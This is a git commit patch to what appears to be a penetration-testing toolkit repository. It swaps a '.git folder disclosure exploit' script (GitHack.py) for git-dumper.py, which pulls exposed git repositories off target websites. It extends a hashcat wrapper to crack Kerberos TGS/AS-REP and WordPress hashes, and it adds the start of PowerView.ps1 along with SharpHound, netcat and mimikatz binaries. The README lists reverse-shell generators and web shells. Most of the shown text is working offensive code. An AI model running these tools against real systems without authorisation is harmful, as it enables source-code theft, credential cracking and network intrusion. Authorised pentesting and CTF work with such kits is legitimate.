From 3f08063b4fee8fa512ec39cd71e1b198f77c8223 Mon Sep 17 00:00:00 2001 From: Roman Hergenreder Date: Mon, 8 Jun 2020 14:28:22 +0200 Subject: [PATCH] win binaries + git-dumper + crack_hash --- GitHack.py | 236 - README.md | 6 +- crack_hash.py | 19 +- git-dumper.py | 556 + util.py | 12 + win/PowerView.ps1 | 20914 +++++++++++++++++++++++++++++ win/SharpHound.exe | Bin 0 -> 832512 bytes mimikatz.exe => win/mimikatz.exe | Bin win/nc.exe | Bin 0 -> 38616 bytes win/nc64.exe | Bin 0 -> 45272 bytes powercat.ps1 => win/powercat.ps1 | 0 winPEAS.bat => win/winPEAS.bat | 0 12 files changed, 21502 insertions(+), 241 deletions(-) delete mode 100644 GitHack.py mode change 100644 => 100755 crack_hash.py create mode 100755 git-dumper.py create mode 100644 win/PowerView.ps1 create mode 100644 win/SharpHound.exe rename mimikatz.exe => win/mimikatz.exe (100%) create mode 100644 win/nc.exe create mode 100644 win/nc64.exe rename powercat.ps1 => win/powercat.ps1 (100%) rename winPEAS.bat => win/winPEAS.bat (100%) diff --git a/GitHack.py b/GitHack.py deleted file mode 100644 index c5897c0..0000000 --- a/GitHack.py +++ /dev/null @@ -1,236 +0,0 @@ -#!/usr/bin/env python - -from urllib.parse import urlparse -import threading -import collections -import binascii -import requests -import struct -import queue -import time -import ssl -import sys -import os -import re - -def check(boolean, message): - if not boolean: - print("error: " + message) - exit(1) - -def parse(filename, pretty=True): - with open(filename, "rb") as f: - # f = mmap.mmap(o.fileno(), 0, access=mmap.ACCESS_READ) - - def read(format): - # "All binary numbers are in network byte order." - # Hence "!" = network order, big endian - format = "! " + format - bytes = f.read(struct.calcsize(format)) - return struct.unpack(format, bytes)[0] - - index = collections.OrderedDict() - - # 4-byte signature, b"DIRC" - index["signature"] = f.read(4).decode("ascii") - check(index["signature"] == "DIRC", "Not a Git index file") - - # 4-byte version number - index["version"] = read("I") - check(index["version"] in {2, 3}, - "Unsupported version: %s" % index["version"]) - - # 32-bit number of index entries, i.e. 4-byte - index["entries"] = read("I") - - yield index - - for n in range(index["entries"]): - entry = collections.OrderedDict() - - entry["entry"] = n + 1 - - entry["ctime_seconds"] = read("I") - entry["ctime_nanoseconds"] = read("I") - if pretty: - entry["ctime"] = entry["ctime_seconds"] - entry["ctime"] += entry["ctime_nanoseconds"] / 1000000000 - del entry["ctime_seconds"] - del entry["ctime_nanoseconds"] - - entry["mtime_seconds"] = read("I") - entry["mtime_nanoseconds"] = read("I") - if pretty: - entry["mtime"] = entry["mtime_seconds"] - entry["mtime"] += entry["mtime_nanoseconds"] / 1000000000 - del entry["mtime_seconds"] - del entry["mtime_nanoseconds"] - - entry["dev"] = read("I") - entry["ino"] = read("I") - - # 4-bit object type, 3-bit unused, 9-bit unix permission - entry["mode"] = read("I") - if pretty: - entry["mode"] = "%06o" % entry["mode"] - - entry["uid"] = read("I") - entry["gid"] = read("I") - entry["size"] = read("I") - - entry["sha1"] = binascii.hexlify(f.read(20)).decode("ascii") - entry["flags"] = read("H") - - # 1-bit assume-valid - entry["assume-valid"] = bool(entry["flags"] & (0b10000000 << 8)) - # 1-bit extended, must be 0 in version 2 - entry["extended"] = bool(entry["flags"] & (0b01000000 << 8)) - # 2-bit stage (?) - stage_one = bool(entry["flags"] & (0b00100000 << 8)) - stage_two = bool(entry["flags"] & (0b00010000 << 8)) - entry["stage"] = stage_one, stage_two - # 12-bit name length, if the length is less than 0xFFF (else, 0xFFF) - namelen = entry["flags"] & 0xFFF - - # 62 bytes so far - entrylen = 62 - - if entry["extended"] and (index["version"] == 3): - entry["extra-flags"] = read("H") - # 1-bit reserved - entry["reserved"] = bool(entry["extra-flags"] & (0b10000000 << 8)) - # 1-bit skip-worktree - entry["skip-worktree"] = bool(entry["extra-flags"] & (0b01000000 << 8)) - # 1-bit intent-to-add - entry["intent-to-add"] = bool(entry["extra-flags"] & (0b00100000 << 8)) - # 13-bits unused - # used = entry["extra-flags"] & (0b11100000 << 8) - # check(not used, "Expected unused bits in extra-flags") - entrylen += 2 - - if namelen < 0xFFF: - entry["name"] = f.read(namelen).decode("utf-8", "replace") - entrylen += namelen - else: - # Do it the hard way - name = [] - while True: - byte = f.read(1) - if byte == "\x00": - break - name.append(byte) - entry["name"] = b"".join(name).decode("utf-8", "replace") - entrylen += 1 - - padlen = (8 - (entrylen % 8)) or 8 - nuls = f.read(padlen) - check(set(nuls) == set([0]), "padding contained non-NUL") - - yield entry - - f.close() - -class Scanner(object): - def __init__(self): - self.base_url = sys.argv[-1] - - self.domain = urlparse(sys.argv[-1]).netloc.replace(':', '_') - if not os.path.exists(self.domain): - os.mkdir(self.domain) - - print('[+] Download and parse index file ...') - data = self._request_data(sys.argv[-1] + '/index') - with open('%s/index' % self.domain, 'wb') as f: - f.write(data) - self.queue = queue.Queue() - for entry in parse('index'): - if "sha1" in entry.keys(): - self.queue.put((entry["sha1"].strip(), entry["name"].strip())) - try: - print(entry['name']) - except Exception as e: - pass - self.lock = threading.Lock() - self.thread_count = 20 - self.STOP_ME = False - - @staticmethod - def _request_data(url): - print(url) - res = requests.get(url, headers={'User-Agent': 'Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X)'}) - if res.status_code != 200: - raise Exception("Server returned: %d %s" % (res.status_code, res.reason)) - - return res.content - - def _print(self, msg): - self.lock.acquire() - try: - print(msg) - except Exception as e: - pass - self.lock.release() - - def get_back_file(self): - - while not self.STOP_ME: - - try: - sha1, file_name = self.queue.get(timeout=0.5) - except Exception as e: - break - - try: - folder = '/objects/%s/' % sha1[:2] - data = self._request_data(self.base_url + folder + sha1[2:]) - try: - data = zlib.decompress(data) - data = re.sub(r'blob \d+\00', '', data) - except: - # self._print('[Error] Fail to decompress %s' % file_name) - pass - - target_dir = os.path.join(self.domain, os.path.dirname(file_name)) - if target_dir and not os.path.exists(target_dir): - os.makedirs(target_dir) - with open(os.path.join(self.domain, file_name), 'wb') as f: - f.write(data) - self._print('[OK] %s' % file_name) - except Exception as e: - self._print('[Error] %s' % str(e)) - - self.exit_thread() - - def exit_thread(self): - self.lock.acquire() - self.thread_count -= 1 - self.lock.release() - - def scan(self): - for i in range(self.thread_count): - t = threading.Thread(target=self.get_back_file) - t.start() - - -if __name__ == '__main__': - context = ssl._create_unverified_context() - if len(sys.argv) == 1: - msg = """ - A `.git` folder disclosure exploit. By LiJieJie - - Usage: GitHack.py http://www.target.com/.git/ - - bug-report: my[at]lijiejie.com (http://www.lijiejie.com) - """ - print(msg) - exit() - - s = Scanner() - s.scan() - try: - while s.thread_count > 0: - time.sleep(0.1) - except KeyboardInterrupt as e: - s.STOP_ME = True - time.sleep(1.0) - print('User Aborted.') diff --git a/README.md b/README.md index d13438c..af283dd 100644 --- a/README.md +++ b/README.md @@ -3,10 +3,10 @@ This repository contains self-made and common scripts for information gathering, enumeration and more. ### Enumeration: Initial Scans -- first_scan.sh: Performs initial nmap scan (-A, -T5, -p-) +- first_scan.sh: Performs initial nmap scan - gobuster.sh: Performs gobuster dir scan with raft-large-words-lowercase.txt - ssh-check-username.py: Check if user enumeration works for ssh -- GitHack.py +- [git-dumper.py](https://github.com/arthaud/git-dumper) - [autorecon.py](https://github.com/Tib3rius/AutoRecon) - subdomainFuzz.sh: Fuzzes subdomains for a given domain @@ -22,7 +22,7 @@ This repository contains self-made and common scripts for information gathering, - genRevShell.py: Generates a reverse shell command (e.g. netcat, python, ...) - [php-reverse-shell.php](https://github.com/pentestmonkey/php-reverse-shell) - [p0wny-shell.php](https://github.com/flozz/p0wny-shell) -- [powercat.ps1][https://github.com/besimorhino/powercat] +- [powercat.ps1](https://github.com/besimorhino/powercat) ### Miscellaneous - upload_file.py: Starts a local tcp server, for netcat usage diff --git a/crack_hash.py b/crack_hash.py old mode 100644 new mode 100755 index 58bea2f..3f8579d --- a/crack_hash.py +++ b/crack_hash.py @@ -21,6 +21,7 @@ class HashType(enum.Enum): RAW_MD5 = 0 MD5_PASS_SALT = 10 MD5_SALT_PASS = 20 + WORDPRESS = 400 # SHA1 RAW_SHA1 = 100 @@ -57,6 +58,11 @@ class HashType(enum.Enum): CRYPT_SHA512 = 1800 CRYPT_APACHE = 1600 + # Kerberos + KERBEROS_AS_REQ = 7500 + KERBEROS_TGS_REP = 13100 + KERBEROS_AS_REP = 18200 + class Hash: def __init__(self, hash): @@ -84,6 +90,14 @@ class Hash: self.type.append(HashType.CRYPT_SHA512) elif crypt_type == "apr1": self.type.append(HashType.CRYPT_APACHE) + elif crypt_type == "krb5tgs": + self.type.append(HashType.KERBEROS_TGS_REP) + elif crypt_type == "krb5asreq": + self.type.append(HashType.KERBEROS_AS_REQ) + elif crypt_type == "krb5asrep": + self.type.append(HashType.KERBEROS_AS_REP) + elif crypt_type == "P": + self.type.append(HashType.WORDPRESS) else: self.isSalted = ":" in raw_hash if self.isSalted: @@ -144,6 +158,7 @@ if len(sys.argv) < 2: exit(1) hashes = [Hash(x) for x in filter(None, [line.strip() for line in open(sys.argv[1],"r").readlines()])] +wordlist = "/usr/share/wordlists/rockyou.txt" if len(sys.argv) < 3 else sys.argv[2] uncracked_hashes = { } for hash in hashes: @@ -156,7 +171,7 @@ for hash in hashes: if len(uncracked_hashes) > 0: uncracked_types = list(uncracked_hashes.keys()) num_types = len(uncracked_types) - if num_types > 0: + if num_types > 1: print("There are multiple uncracked hashes left with different hash types, choose one to proceed with hashcat:") print() @@ -187,6 +202,6 @@ if len(uncracked_hashes) > 0: fp.write(b"%s\n" % hash.hash.encode("UTF-8")) fp.flush() - proc = subprocess.Popen(["hashcat", "-m", str(selected_type.value), "-a", "0", fp.name, "/usr/share/wordlists/rockyou.txt", "--force"]) + proc = subprocess.Popen(["hashcat", "-m", str(selected_type.value), "-a", "0", fp.name, wordlist, "--force"]) proc.wait() fp.close() diff --git a/git-dumper.py b/git-dumper.py new file mode 100755 index 0000000..5c85b00 --- /dev/null +++ b/git-dumper.py @@ -0,0 +1,556 @@ +#!/usr/bin/env python3 +from contextlib import closing +import argparse +import multiprocessing +import os +import os.path +import re +import socket +import subprocess +import sys +import urllib.parse +import urllib3 + +import bs4 +import dulwich.index +import dulwich.objects +import dulwich.pack +import requests +import socks + +USER_AGENT = "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36" + +def printf(fmt, *args, file=sys.stdout): + if args: + fmt = fmt % args + + file.write(fmt) + file.flush() + + +def is_html(response): + ''' Return True if the response is a HTML webpage ''' + return '' in response.text + + +def get_indexed_files(response): + ''' Return all the files in the directory index webpage ''' + html = bs4.BeautifulSoup(response.text, 'html.parser') + files = [] + + for link in html.find_all('a'): + url = urllib.parse.urlparse(link.get('href')) + + if (url.path and + url.path != '.' and + url.path != '..' and + not url.path.startswith('/') and + not url.scheme and + not url.netloc): + files.append(url.path) + + return files + + +def create_intermediate_dirs(path): + ''' Create intermediate directories, if necessary ''' + + dirname, basename = os.path.split(path) + + if dirname and not os.path.exists(dirname): + try: + os.makedirs(dirname) + except FileExistsError: + pass # race condition + + +def get_referenced_sha1(obj_file): + ''' Return all the referenced SHA1 in the given object file ''' + objs = [] + + if isinstance(obj_file, dulwich.objects.Commit): + objs.append(obj_file.tree.decode()) + + for parent in obj_file.parents: + objs.append(parent.decode()) + elif isinstance(obj_file, dulwich.objects.Tree): + for item in obj_file.iteritems(): + objs.append(item.sha.decode()) + elif isinstance(obj_file, dulwich.objects.Blob): + pass + else: + printf('error: unexpected object type: %r\n' % obj_file, file=sys.stderr) + sys.exit(1) + + return objs + + +class Worker(multiprocessing.Process): + ''' Worker for process_tasks ''' + + def __init__(self, pending_tasks, tasks_done, args): + super().__init__() + self.daemon = True + self.pending_tasks = pending_tasks + self.tasks_done = tasks_done + self.args = args + + def run(self): + # initialize process + self.init(*self.args) + + # fetch and do tasks + while True: + task = self.pending_tasks.get(block=True) + + if task is None: # end signal + return + + result = self.do_task(task, *self.args) + + assert isinstance(result, list), 'do_task() should return a list of tasks' + + self.tasks_done.put(result) + + def init(self, *args): + raise NotImplementedError + + def do_task(self, task, *args): + raise NotImplementedError + + +def process_tasks(initial_tasks, worker, jobs, args=(), tasks_done=None): + ''' Process tasks in parallel ''' + + if not initial_tasks: + return + + tasks_seen = set(tasks_done) if tasks_done else set() + pending_tasks = multiprocessing.Queue() + tasks_done = multiprocessing.Queue() + num_pending_tasks = 0 + + # add all initial tasks in the queue + for task in initial_tasks: + assert task is not None + + if task not in tasks_seen: + pending_tasks.put(task) + num_pending_tasks += 1 + tasks_seen.add(task) + + # initialize processes + processes = [worker(pending_tasks, tasks_done, args) for _ in range(jobs)] + + # launch them all + for p in processes: + p.start() + + # collect task results + while num_pending_tasks > 0: + task_result = tasks_done.get(block=True) + num_pending_tasks -= 1 + + for task in task_result: + assert task is not None + + if task not in tasks_seen: + pending_tasks.put(task) + num_pending_tasks += 1 + tasks_seen.add(task) + + # send termination signal (task=None) + for _ in range(jobs): + pending_tasks.put(None) + + # join all + for p in processes: + p.join() + + +class DownloadWorker(Worker): + ''' Download a list of files ''' + + def init(self, url, directory, retry, timeout): + self.session = requests.Session() + self.session.verify = False + self.session.mount(url, requests.adapters.HTTPAdapter(max_retries=retry)) + + def do_task(self, filepath, url, directory, retry, timeout): + with closing(self.session.get('%s/%s' % (url, filepath), + allow_redirects=False, + stream=True, + timeout=timeout, + headers={"User-Agent": USER_AGENT})) as response: + printf('[-] Fetching %s/%s [%d]\n', url, filepath, response.status_code) + + if response.status_code != 200: + return [] + + abspath = os.path.abspath(os.path.join(directory, filepath)) + create_intermediate_dirs(abspath) + + # write file + with open(abspath, 'wb') as f: + for chunk in response.iter_content(4096): + f.write(chunk) + + return [] + + +class RecursiveDownloadWorker(DownloadWorker): + ''' Download a directory recursively ''' + + def do_task(self, filepath, url, directory, retry, timeout): + with closing(self.session.get('%s/%s' % (url, filepath), + allow_redirects=False, + stream=True, + timeout=timeout, + headers={"User-Agent": USER_AGENT})) as response: + printf('[-] Fetching %s/%s [%d]\n', url, filepath, response.status_code) + + if (response.status_code in (301, 302) and + 'Location' in response.headers and + response.headers['Location'].endswith(filepath + '/')): + return [filepath + '/'] + + if response.status_code != 200: + return [] + + if filepath.endswith('/'): # directory index + assert is_html(response) + + return [filepath + filename for filename in get_indexed_files(response)] + else: # file + abspath = os.path.abspath(os.path.join(directory, filepath)) + create_intermediate_dirs(abspath) + + # write file + with open(abspath, 'wb') as f: + for chunk in response.iter_content(4096): + f.write(chunk) + + return [] + + +class FindRefsWorker(DownloadWorker): + ''' Find refs/ ''' + + def do_task(self, filepath, url, directory, retry, timeout): + response = self.session.get('%s/%s' % (url, filepath), + allow_redirects=False, + timeout=timeout, + headers={"User-Agent": USER_AGENT}) + printf('[-] Fetching %s/%s [%d]\n', url, filepath, response.status_code) + + if response.status_code != 200: + return [] + + abspath = os.path.abspath(os.path.join(directory, filepath)) + create_intermediate_dirs(abspath) + + # write file + with open(abspath, 'w') as f: + f.write(response.text) + + # find refs + tasks = [] + + for ref in re.findall(r'(refs(/[a-zA-Z0-9\-\.\_\*]+)+)', response.text): + ref = ref[0] + if not ref.endswith('*'): + tasks.append('.git/%s' % ref) + tasks.append('.git/logs/%s' % ref) + + return tasks + + +class FindObjectsWorker(DownloadWorker): + ''' Find objects ''' + + def do_task(self, obj, url, directory, retry, timeout): + filepath = '.git/objects/%s/%s' % (obj[:2], obj[2:]) + response = self.session.get('%s/%s' % (url, filepath), + allow_redirects=False, + timeout=timeout, + headers={"User-Agent": USER_AGENT}) + printf('[-] Fetching %s/%s [%d]\n', url, filepath, response.status_code) + + if response.status_code != 200: + return [] + + abspath = os.path.abspath(os.path.join(directory, filepath)) + create_intermediate_dirs(abspath) + + # write file + with open(abspath, 'wb') as f: + f.write(response.content) + + # parse object file to find other objects + obj_file = dulwich.objects.ShaFile.from_path(abspath) + return get_referenced_sha1(obj_file) + + +def fetch_git(url, directory, jobs, retry, timeout): + ''' Dump a git repository into the output directory ''' + + assert os.path.isdir(directory), '%s is not a directory' % directory + assert not os.listdir(directory), '%s is not empty' % directory + assert jobs >= 1, 'invalid number of jobs' + assert retry >= 1, 'invalid number of retries' + assert timeout >= 1, 'invalid timeout' + + # find base url + if not url.startswith("http://") and not url.startswith("https://"): + url = "http://" + url + + url = url.rstrip('/') + if url.endswith('HEAD'): + url = url[:-4] + url = url.rstrip('/') + if url.endswith('.git'): + url = url[:-4] + url = url.rstrip('/') + + # check for /.git/HEAD + printf('[-] Testing %s/.git/HEAD ', url) + response = requests.get('%s/.git/HEAD' % url, verify=False, allow_redirects=False, headers={"User-Agent": USER_AGENT}) + printf('[%d]\n', response.status_code) + + if response.status_code != 200: + printf('error: %s/.git/HEAD does not exist\n', url, file=sys.stderr) + return 1 + elif not response.text.startswith('ref:'): + printf('error: %s/.git/HEAD is not a git HEAD file\n', url, file=sys.stderr) + return 1 + + # check for directory listing + printf('[-] Testing %s/.git/ ', url) + response = requests.get('%s/.git/' % url, verify=False, allow_redirects=False, headers={"User-Agent": USER_AGENT}) + printf('[%d]\n', response.status_code) + + if response.status_code == 200 and is_html(response) and 'HEAD' in get_indexed_files(response): + printf('[-] Fetching .git recursively\n') + process_tasks(['.git/', '.gitignore'], + RecursiveDownloadWorker, + jobs, + args=(url, directory, retry, timeout)) + + printf('[-] Running git checkout .\n') + os.chdir(directory) + subprocess.check_call(['git', 'checkout', '.']) + return 0 + + # no directory listing + printf('[-] Fetching common files\n') + tasks = [ + '.gitignore', + '.git/COMMIT_EDITMSG', + '.git/description', + '.git/hooks/applypatch-msg.sample', + '.git/hooks/applypatch-msg.sample', + '.git/hooks/applypatch-msg.sample', + '.git/hooks/commit-msg.sample', + '.git/hooks/post-commit.sample', + '.git/hooks/post-receive.sample', + '.git/hooks/post-update.sample', + '.git/hooks/pre-applypatch.sample', + '.git/hooks/pre-commit.sample', + '.git/hooks/pre-push.sample', + '.git/hooks/pre-rebase.sample', + '.git/hooks/pre-receive.sample', + '.git/hooks/prepare-commit-msg.sample', + '.git/hooks/update.sample', + '.git/index', + '.git/info/exclude', + '.git/objects/info/packs', + ] + process_tasks(tasks, + DownloadWorker, + jobs, + args=(url, directory, retry, timeout)) + + # find refs + printf('[-] Finding refs/\n') + tasks = [ + '.git/FETCH_HEAD', + '.git/HEAD', + '.git/ORIG_HEAD', + '.git/config', + '.git/info/refs', + '.git/logs/HEAD', + '.git/logs/refs/heads/master', + '.git/logs/refs/remotes/origin/HEAD', + '.git/logs/refs/remotes/origin/master', + '.git/logs/refs/stash', + '.git/packed-refs', + '.git/refs/heads/master', + '.git/refs/remotes/origin/HEAD', + '.git/refs/remotes/origin/master', + '.git/refs/stash', + '.git/refs/wip/wtree/refs/heads/master', #Magit + '.git/refs/wip/index/refs/heads/master' #Magit + ] + + process_tasks(tasks, + FindRefsWorker, + jobs, + args=(url, directory, retry, timeout)) + + # find packs + printf('[-] Finding packs\n') + tasks = [] + + # use .git/objects/info/packs to find packs + info_packs_path = os.path.join(directory, '.git', 'objects', 'info', 'packs') + if os.path.exists(info_packs_path): + with open(info_packs_path, 'r') as f: + info_packs = f.read() + + for sha1 in re.findall(r'pack-([a-f0-9]{40})\.pack', info_packs): + tasks.append('.git/objects/pack/pack-%s.idx' % sha1) + tasks.append('.git/objects/pack/pack-%s.pack' % sha1) + + process_tasks(tasks, + DownloadWorker, + jobs, + args=(url, directory, retry, timeout)) + + # find objects + printf('[-] Finding objects\n') + objs = set() + packed_objs = set() + + # .git/packed-refs, .git/info/refs, .git/refs/*, .git/logs/* + files = [ + os.path.join(directory, '.git', 'packed-refs'), + os.path.join(directory, '.git', 'info', 'refs'), + os.path.join(directory, '.git', 'FETCH_HEAD'), + os.path.join(directory, '.git', 'ORIG_HEAD'), + ] + for dirpath, _, filenames in os.walk(os.path.join(directory, '.git', 'refs')): + for filename in filenames: + files.append(os.path.join(dirpath, filename)) + for dirpath, _, filenames in os.walk(os.path.join(directory, '.git', 'logs')): + for filename in filenames: + files.append(os.path.join(dirpath, filename)) + + for filepath in files: + if not os.path.exists(filepath): + continue + + with open(filepath, 'r') as f: + content = f.read() + + for obj in re.findall(r'(^|\s)([a-f0-9]{40})($|\s)', content): + obj = obj[1] + objs.add(obj) + + # use .git/index to find objects + index_path = os.path.join(directory, '.git', 'index') + if os.path.exists(index_path): + index = dulwich.index.Index(index_path) + + for entry in index.iterblobs(): + objs.add(entry[1].decode()) + + # use packs to find more objects to fetch, and objects that are packed + pack_file_dir = os.path.join(directory, '.git', 'objects', 'pack') + if os.path.isdir(pack_file_dir): + for filename in os.listdir(pack_file_dir): + if filename.startswith('pack-') and filename.endswith('.pack'): + pack_data_path = os.path.join(pack_file_dir, filename) + pack_idx_path = os.path.join(pack_file_dir, filename[:-5] + '.idx') + pack_data = dulwich.pack.PackData(pack_data_path) + pack_idx = dulwich.pack.load_pack_index(pack_idx_path) + pack = dulwich.pack.Pack.from_objects(pack_data, pack_idx) + + for obj_file in pack.iterobjects(): + packed_objs.add(obj_file.sha().hexdigest()) + objs |= set(get_referenced_sha1(obj_file)) + + # fetch all objects + printf('[-] Fetching objects\n') + process_tasks(objs, + FindObjectsWorker, + jobs, + args=(url, directory, retry, timeout), + tasks_done=packed_objs) + + # git checkout + printf('[-] Running git checkout .\n') + os.chdir(directory) + + # ignore errors + subprocess.call(['git', 'checkout', '.'], stderr=open(os.devnull, 'wb')) + + return 0 + + +if __name__ == '__main__': + parser = argparse.ArgumentParser(usage='%(prog)s [options] URL DIR', + description='Dump a git repository from a website.') + parser.add_argument('url', metavar='URL', + help='url') + parser.add_argument('directory', metavar='DIR', + help='output directory') + parser.add_argument('--proxy', + help='use the specified proxy') + parser.add_argument('-j', '--jobs', type=int, default=10, + help='number of simultaneous requests') + parser.add_argument('-r', '--retry', type=int, default=3, + help='number of request attempts before giving up') + parser.add_argument('-t', '--timeout', type=int, default=3, + help='maximum time in seconds before giving up') + args = parser.parse_args() + + # jobs + if args.jobs < 1: + parser.error('invalid number of jobs') + + # retry + if args.retry < 1: + parser.error('invalid number of retries') + + # timeout + if args.timeout < 1: + parser.error('invalid timeout') + + # proxy + if args.proxy: + proxy_valid = False + + for pattern, proxy_type in [ + (r'^socks5:(.*):(\d+)$', socks.PROXY_TYPE_SOCKS5), + (r'^socks4:(.*):(\d+)$', socks.PROXY_TYPE_SOCKS4), + (r'^http://(.*):(\d+)$', socks.PROXY_TYPE_HTTP), + (r'^(.*):(\d+)$', socks.PROXY_TYPE_SOCKS5)]: + m = re.match(pattern, args.proxy) + if m: + socks.setdefaultproxy(proxy_type, m.group(1), int(m.group(2))) + socket.socket = socks.socksocket + proxy_valid = True + break + + if not proxy_valid: + parser.error('invalid proxy') + + # output directory + if not os.path.exists(args.directory): + os.makedirs(args.directory) + + if not os.path.isdir(args.directory): + parser.error('%s is not a directory' % args.directory) + + if os.listdir(args.directory): + parser.error('%s is not empty' % args.directory) + + urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) + + # fetch everything + code = fetch_git(args.url, args.directory, args.jobs, args.retry, args.timeout) + path = os.path.realpath(args.directory) + if not os.listdir(path): + os.rmdir(path) + + sys.exit(code) diff --git a/util.py b/util.py index 43ce197..4b72381 100644 --- a/util.py +++ b/util.py @@ -1,6 +1,7 @@ import random import socket import netifaces as ni +import sys def getAddress(interface="tun0"): if not interface in ni.interfaces(): @@ -35,3 +36,14 @@ def openServer(address, ports=None): if not retry: print("Unable to listen on port %d: %s" % (listenPort, str(e))) raise e + +if __name__ == "__main__": + if len(sys.argv) < 2: + print("Usage: %s [command]" % sys.argv[0]) + exit(1) + + if sys.argv[1] == "getAddress": + if len(sys.argv) > 2: + print(getAddress(sys.argv[2])) + else: + print(getAddress()) diff --git a/win/PowerView.ps1 b/win/PowerView.ps1 new file mode 100644 index 0000000..2dc5234 --- /dev/null +++ b/win/PowerView.ps1 @@ -0,0 +1,20914 @@ +#requires -version 2 + +<# + +PowerSploit File: PowerView.ps1 +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None + +#> + + +######################################################## +# +# PSReflect code for Windows API access +# Author: @mattifestation +# https://raw.githubusercontent.com/mattifestation/PSReflect/master/PSReflect.psm1 +# +######################################################## + +function New-InMemoryModule { +<# +.SYNOPSIS + +Creates an in-memory assembly and module + +Author: Matthew Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: None + +.DESCRIPTION + +When defining custom enums, structs, and unmanaged functions, it is +necessary to associate to an assembly module. This helper function +creates an in-memory module that can be passed to the 'enum', +'struct', and Add-Win32Type functions. + +.PARAMETER ModuleName + +Specifies the desired name for the in-memory assembly and module. If +ModuleName is not provided, it will default to a GUID. + +.EXAMPLE + +$Module = New-InMemoryModule -ModuleName Win32 +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')] + [CmdletBinding()] + Param ( + [Parameter(Position = 0)] + [ValidateNotNullOrEmpty()] + [String] + $ModuleName = [Guid]::NewGuid().ToString() + ) + + $AppDomain = [Reflection.Assembly].Assembly.GetType('System.AppDomain').GetProperty('CurrentDomain').GetValue($null, @()) + $LoadedAssemblies = $AppDomain.GetAssemblies() + + foreach ($Assembly in $LoadedAssemblies) { + if ($Assembly.FullName -and ($Assembly.FullName.Split(',')[0] -eq $ModuleName)) { + return $Assembly + } + } + + $DynAssembly = New-Object Reflection.AssemblyName($ModuleName) + $Domain = $AppDomain + $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, 'Run') + $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule($ModuleName, $False) + + return $ModuleBuilder +} + + +# A helper function used to reduce typing while defining function +# prototypes for Add-Win32Type. +function func { + Param ( + [Parameter(Position = 0, Mandatory = $True)] + [String] + $DllName, + + [Parameter(Position = 1, Mandatory = $True)] + [string] + $FunctionName, + + [Parameter(Position = 2, Mandatory = $True)] + [Type] + $ReturnType, + + [Parameter(Position = 3)] + [Type[]] + $ParameterTypes, + + [Parameter(Position = 4)] + [Runtime.InteropServices.CallingConvention] + $NativeCallingConvention, + + [Parameter(Position = 5)] + [Runtime.InteropServices.CharSet] + $Charset, + + [String] + $EntryPoint, + + [Switch] + $SetLastError + ) + + $Properties = @{ + DllName = $DllName + FunctionName = $FunctionName + ReturnType = $ReturnType + } + + if ($ParameterTypes) { $Properties['ParameterTypes'] = $ParameterTypes } + if ($NativeCallingConvention) { $Properties['NativeCallingConvention'] = $NativeCallingConvention } + if ($Charset) { $Properties['Charset'] = $Charset } + if ($SetLastError) { $Properties['SetLastError'] = $SetLastError } + if ($EntryPoint) { $Properties['EntryPoint'] = $EntryPoint } + + New-Object PSObject -Property $Properties +} + + +function Add-Win32Type +{ +<# +.SYNOPSIS + +Creates a .NET type for an unmanaged Win32 function. + +Author: Matthew Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: func + +.DESCRIPTION + +Add-Win32Type enables you to easily interact with unmanaged (i.e. +Win32 unmanaged) functions in PowerShell. After providing +Add-Win32Type with a function signature, a .NET type is created +using reflection (i.e. csc.exe is never called like with Add-Type). + +The 'func' helper function can be used to reduce typing when defining +multiple function definitions. + +.PARAMETER DllName + +The name of the DLL. + +.PARAMETER FunctionName + +The name of the target function. + +.PARAMETER EntryPoint + +The DLL export function name. This argument should be specified if the +specified function name is different than the name of the exported +function. + +.PARAMETER ReturnType + +The return type of the function. + +.PARAMETER ParameterTypes + +The function parameters. + +.PARAMETER NativeCallingConvention + +Specifies the native calling convention of the function. Defaults to +stdcall. + +.PARAMETER Charset + +If you need to explicitly call an 'A' or 'W' Win32 function, you can +specify the character set. + +.PARAMETER SetLastError + +Indicates whether the callee calls the SetLastError Win32 API +function before returning from the attributed method. + +.PARAMETER Module + +The in-memory module that will host the functions. Use +New-InMemoryModule to define an in-memory module. + +.PARAMETER Namespace + +An optional namespace to prepend to the type. Add-Win32Type defaults +to a namespace consisting only of the name of the DLL. + +.EXAMPLE + +$Mod = New-InMemoryModule -ModuleName Win32 + +$FunctionDefinitions = @( + (func kernel32 GetProcAddress ([IntPtr]) @([IntPtr], [String]) -Charset Ansi -SetLastError), + (func kernel32 GetModuleHandle ([Intptr]) @([String]) -SetLastError), + (func ntdll RtlGetCurrentPeb ([IntPtr]) @()) +) + +$Types = $FunctionDefinitions | Add-Win32Type -Module $Mod -Namespace 'Win32' +$Kernel32 = $Types['kernel32'] +$Ntdll = $Types['ntdll'] +$Ntdll::RtlGetCurrentPeb() +$ntdllbase = $Kernel32::GetModuleHandle('ntdll') +$Kernel32::GetProcAddress($ntdllbase, 'RtlGetCurrentPeb') + +.NOTES + +Inspired by Lee Holmes' Invoke-WindowsApi http://poshcode.org/2189 + +When defining multiple function prototypes, it is ideal to provide +Add-Win32Type with an array of function signatures. That way, they +are all incorporated into the same in-memory module. +#> + + [OutputType([Hashtable])] + Param( + [Parameter(Mandatory=$True, ValueFromPipelineByPropertyName=$True)] + [String] + $DllName, + + [Parameter(Mandatory=$True, ValueFromPipelineByPropertyName=$True)] + [String] + $FunctionName, + + [Parameter(ValueFromPipelineByPropertyName=$True)] + [String] + $EntryPoint, + + [Parameter(Mandatory=$True, ValueFromPipelineByPropertyName=$True)] + [Type] + $ReturnType, + + [Parameter(ValueFromPipelineByPropertyName=$True)] + [Type[]] + $ParameterTypes, + + [Parameter(ValueFromPipelineByPropertyName=$True)] + [Runtime.InteropServices.CallingConvention] + $NativeCallingConvention = [Runtime.InteropServices.CallingConvention]::StdCall, + + [Parameter(ValueFromPipelineByPropertyName=$True)] + [Runtime.InteropServices.CharSet] + $Charset = [Runtime.InteropServices.CharSet]::Auto, + 